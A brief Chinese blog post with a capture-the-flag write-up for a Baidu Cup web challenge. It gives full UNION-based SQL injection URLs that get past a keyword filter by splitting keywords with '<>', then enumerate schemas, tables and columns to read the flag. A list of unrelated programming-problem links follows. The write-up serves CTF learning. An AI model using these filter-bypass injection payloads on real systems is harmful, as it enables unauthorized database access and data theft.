• 百度杯CTF比赛 九月场-WEB-题目名称:SQL

    1 根据提示和id参数  判断这个地方有注入 测试发现有过滤。使用<>可以绕过。 先用orderby进行判断,发现3列,2处有回显。

    2 查数据库名 http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,schema_name,3 fro<>m information_schema.schemata

    3 查表名 http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,table_name,3 from information_schema.tables where table_schema="sqli" 4 显示列名 http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,column_name,3 fro<>m information_schema.columns where table_name='info';

    5 显示flag ​http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,flAg_T5ZNdrm,3 fro<>m info;
  • 相关阅读:
    P2207 Photo
    P1022 计算器的改良
    P1003 铺地毯
    P3014 [USACO11FEB]牛线Cow Line && 康托展开
    P4180 【模板】严格次小生成树[BJWC2010]
    P2776 [SDOI2007]小组队列
    P2426 删数
    P1948 [USACO08JAN]电话线Telephone Lines
    P1978 集合
    P1564 膜拜
  • 原文地址:https://www.cnblogs.com/ly584521/p/13959283.html
Copyright © 2020-2023  润新知